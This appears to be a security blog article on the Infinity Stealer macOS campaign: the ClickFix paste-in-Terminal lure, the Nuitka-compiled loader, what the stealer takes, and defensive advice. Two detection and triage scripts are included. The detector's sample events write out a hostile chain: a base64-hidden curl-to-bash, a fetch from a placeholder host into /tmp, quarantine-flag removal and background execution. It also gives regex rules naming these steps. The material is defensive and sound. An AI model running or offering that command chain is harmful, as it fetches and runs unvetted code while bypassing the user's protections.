Infinity Stealer: the macOS threat that combines ClickFix and Python Nuitka to evade detection

Published · 5 min read · 116 reads

Security researchers have documented a new campaign targeting macOS users that combines convincing social engineering with a packaging technique that complicates forensic analysis. The actor behind this operation distributes an information stealer named Infinity Stealer and relies on a visual lure that imitates human-verification screens to push the victim into running code in Terminal.

The attack's entry point is a website that pretends to be a human-verification step (something that many services, such as Cloudflare, use legitimately). Instead of asking the browser to solve a graphical challenge, the page asks the user to copy a base64-encoded curl command and paste it into Terminal. That single gesture, apparently harmless to anyone who trusts the fake verification, decodes and launches a bash sequence that downloads a second component, writes it to /tmp, removes the file's quarantine flag and runs it in the background. The result is that the system's user-facing protections are bypassed and a chain of malicious stages starts without any further interaction.
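The command chain described above leaves a recognizable trail in per-process command lines. The following detector is an added example (not code from the article or from the Malwarebytes report): the regexes, the `example.invalid` hostnames and the event lines are all constructed for illustration, and it also decodes base64-looking arguments so that a hidden `curl | bash` is visible to the same rules.

```python
import base64, binascii, re

# Per-command-line rules (regexes written for this example, not report signatures).
RULES = {
    "base64_decode_to_shell": re.compile(r"base64\s+(?:-d|-D|--decode)\b.*\|\s*(?:ba|z)?sh\b"),
    "curl_piped_to_shell": re.compile(r"\bcurl\b.*\|\s*(?:ba|z)?sh\b"),
    "download_to_tmp": re.compile(r"\b(?:curl|wget)\b.*\s-[oO]\s*/tmp/"),
    "quarantine_flag_removed": re.compile(r"\bxattr\b.*(?:com\.apple\.quarantine|\s-c\b)"),
    "background_exec_from_tmp": re.compile(r"(?:^|\s)/tmp/\S+.*&\s*$"),
}
_B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")

def decode_b64_tokens(line: str) -> list[str]:
    """Decode base64-looking arguments so the rules can see the hidden command."""
    decoded = []
    for tok in _B64_TOKEN.findall(line):
        try:
            text = base64.b64decode(tok, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if text.isprintable():
            decoded.append(text)
    return decoded

def analyze(lines: list[str]) -> list[dict]:
    """Run every rule over each line and over any base64 payload it carries."""
    findings = []
    for idx, line in enumerate(lines):
        hits = [name for name, rx in RULES.items() if rx.search(line)]
        for text in decode_b64_tokens(line):
            hits += ["decoded:" + n for n, rx in RULES.items() if rx.search(text)]
        if hits:
            findings.append({"line": idx, "cmd": line, "rules": hits})
    return findings

def chain_detected(findings: list[dict], min_stages: int = 3) -> bool:
    """The chain spans several commands, so alert on distinct rule families per session."""
    families = {r.split(":")[-1] for f in findings for r in f["rules"]}
    return len(families) >= min_stages

# Constructed sample: one shell command line per process event, as an EDR or
# shell history might record it (hostnames and paths are placeholders).
_ENCODED = base64.b64encode(b"curl -fsSL http://example.invalid/a | bash").decode()
SAMPLE_EVENTS = [
    f"echo {_ENCODED} | base64 -d | bash",
    "curl -fsSL http://example.invalid/stage2 -o /tmp/.update",
    "xattr -d com.apple.quarantine /tmp/.update",
    "nohup /tmp/.update >/dev/null 2>&1 &",
    "xattr -l ~/Downloads/report.pdf",
]
```

`analyze(SAMPLE_EVENTS)` flags the first four events and `chain_detected` fires because four distinct stages appear in one session, while the benign `xattr -l` line stays quiet.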

[Image: Infinity Stealer, the macOS threat that combines ClickFix and Python Nuitka to evade detection. Image generated with AI.]

What distinguishes this campaign is not just the visual trick, known in the research as ClickFix, but how the main payload is built: it is Python code compiled with the open-source Nuitka project. Unlike utilities such as PyInstaller, which pack the Python interpreter and bytecode into a recognizable container, Nuitka translates the Python code to C and generates a native binary. That produces a real Mach-O executable that is far more resistant to classic static analysis techniques and complicates reverse engineering.

The technical findings published by the analysts who investigated the campaign provide worrying details. The initial loader compiled with Nuitka is a multi-megabyte binary that contains a large zstd-compressed blob; inside it is the final stage of the infostealer. Before it starts collecting information, the malware performs a series of checks to determine whether it is running in a virtualized environment or a sandbox, which lets it evade automated analysis and research environments.

Once deployed, the Python component (running on Python 3.11 in the cases analyzed) includes the capabilities typical of credential stealers: screenshot capture, extraction of credentials from Chromium-based browsers and Firefox, exfiltration of entries from the macOS Keychain, locating cryptocurrency wallets and searching for secrets in development files such as .env. Everything collected is sent to the command-and-control server via HTTP POST requests and, in addition, the operators receive a Telegram notification when the operation finishes, using that platform's Bot API.

The technical report describing the campaign stresses that, as far as the observations go, this is the first documented campaign that combines ClickFix delivery with an infostealer written in Python and compiled with Nuitka on macOS. This combination of social engineering and native packaging is an advance in attackers' ability to evade traditional detections and slows the work of response teams.

Why does Nuitka complicate detection? Because it leaves fewer of the signals typical of Python malware: there is no obvious bytecode layer that tools and analysts can unpack to recover the logic; instead, what appears is a native binary that, in signature and structure, looks much more like a legitimate application. Add to this the multi-stage obfuscation (compressed blobs inside the executable, use of environment variables to pass tokens, removal of traces when execution ends) and the task of intelligence gathering and manual analysis becomes much more laborious.
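Even without unpacking the logic, a triage script can confirm the structural traits the last three paragraphs describe: a Mach-O container, an embedded zstd frame and its declared payload size, and strings that hint at a Nuitka onefile build. This is an added example, not code from the article or the Malwarebytes report; the marker strings are my assumptions to verify against a known sample, and the input bytes are constructed.

```python
import re
import struct
from typing import Optional

MACHO_MAGICS = {b"\xcf\xfa\xed\xfe": "MH_MAGIC_64", b"\xce\xfa\xed\xfe": "MH_MAGIC",
                b"\xca\xfe\xba\xbe": "FAT_MAGIC"}
ZSTD_MAGIC = b"\x28\xb5\x2f\xfd"                 # Zstandard frame magic (RFC 8878)
NUITKA_MARKERS = [b"NUITKA_ONEFILE_PARENT", b"__compiled__"]  # assumed hints, verify

def zstd_frame_content_size(data: bytes, off: int) -> Optional[int]:
    """Parse the frame header at off (pointing at ZSTD_MAGIC) and return the
    declared Frame_Content_Size, or None when the frame does not declare one."""
    if off + 5 > len(data):
        return None
    fhd = data[off + 4]                          # Frame_Header_Descriptor
    fcs_flag, single_segment, dict_flag = fhd >> 6, (fhd >> 5) & 1, fhd & 3
    pos = off + 5
    if not single_segment:
        pos += 1                                 # Window_Descriptor byte
    pos += (0, 1, 2, 4)[dict_flag]               # Dictionary_ID bytes
    fcs_size = (1 if single_segment else 0, 2, 4, 8)[fcs_flag]
    if fcs_size == 0:
        return None
    value = int.from_bytes(data[pos:pos + fcs_size], "little")
    return value + 256 if fcs_size == 2 else value   # 2-byte field is offset by 256

def triage(data: bytes) -> dict:
    """Report Mach-O kind, embedded zstd frames with declared sizes and Nuitka hints."""
    kind = MACHO_MAGICS.get(data[:4])
    frames = [m.start() for m in re.finditer(re.escape(ZSTD_MAGIC), data)]
    sizes = [zstd_frame_content_size(data, o) for o in frames]
    markers = [m.decode() for m in NUITKA_MARKERS if m in data]
    return {"macho": kind, "zstd_frames": frames, "declared_sizes": sizes,
            "nuitka_markers": markers,
            "nuitka_onefile_suspect": kind is not None and bool(frames) and bool(markers)}

def build_sample() -> bytes:
    """Constructed stand-in for a loader: 64-bit Mach-O magic, filler, marker
    strings, then a zstd frame header declaring a ~3 MB payload."""
    header = b"\xcf\xfa\xed\xfe" + b"\x00" * 28
    strings = b"\x00".join(NUITKA_MARKERS) + b"\x00"
    # FHD 0x80: FCS flag 2 (4-byte size), single-segment off -> window byte follows
    frame = ZSTD_MAGIC + b"\x80\x58" + struct.pack("<I", 3_000_000) + b"\x00" * 16
    return header + b"\x90" * 64 + strings + b"\x00" * 32 + frame
```

On a real binary the declared size tells you how large the decompressed stage will be before you hand it to a zstd tool, and the marker hits decide whether a Python-aware analysis path is worth trying at all.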

If you want to read the original technical analysis and the indicators collected by the researchers, the research is available on the Malwarebytes blog: Malwarebytes - Infinity Stealer. To better understand the technical differences between Python packaging tools, you can consult the documentation of Nuitka and PyInstaller. And if you are interested in how legitimate human checks work on the web, Cloudflare's documentation on its verification system (Turnstile) is a good reference: Cloudflare Turnstile. Finally, the way operators report results through bots can rely on Telegram's public API: Telegram Bot API.


For users and administrators this leaves clear lessons. First, never paste into Terminal commands taken from web pages or messages without understanding exactly what they do; that practice is the most frequently repeated entry point in campaigns like this one. Second, harden execution policies on macOS machines: apply Gatekeeper controls, keep the system and applications up to date, and consider endpoint protection solutions that inspect unusual behaviour rather than relying only on static signatures. Apple has support documentation that explains how Gatekeeper and file quarantine help protect devices: Apple Support - Problems installing or opening apps.

If you suspect you may have been a victim of this type of infection, it is recommended to disconnect the machine from the network, avoid reusing credentials that may have been exposed, change passwords from another trusted device, and contact incident response services or use trusted tools to search for known artifacts. In corporate environments, blocking the execution of unsigned binaries via MDM and reviewing terminal logs and outbound connections can help detect compromises early.

The Infinity Stealer case is a reminder that macOS threats keep evolving: attackers combine psychological tactics with obfuscation and packaging techniques to maximize impact and minimize the chance of being analyzed. Keeping a reasonable suspicion of pop-up windows, verification challenges or instructions to paste commands, and strengthening security policies, are simple measures that in the long run can make the difference between a scare and a breach.
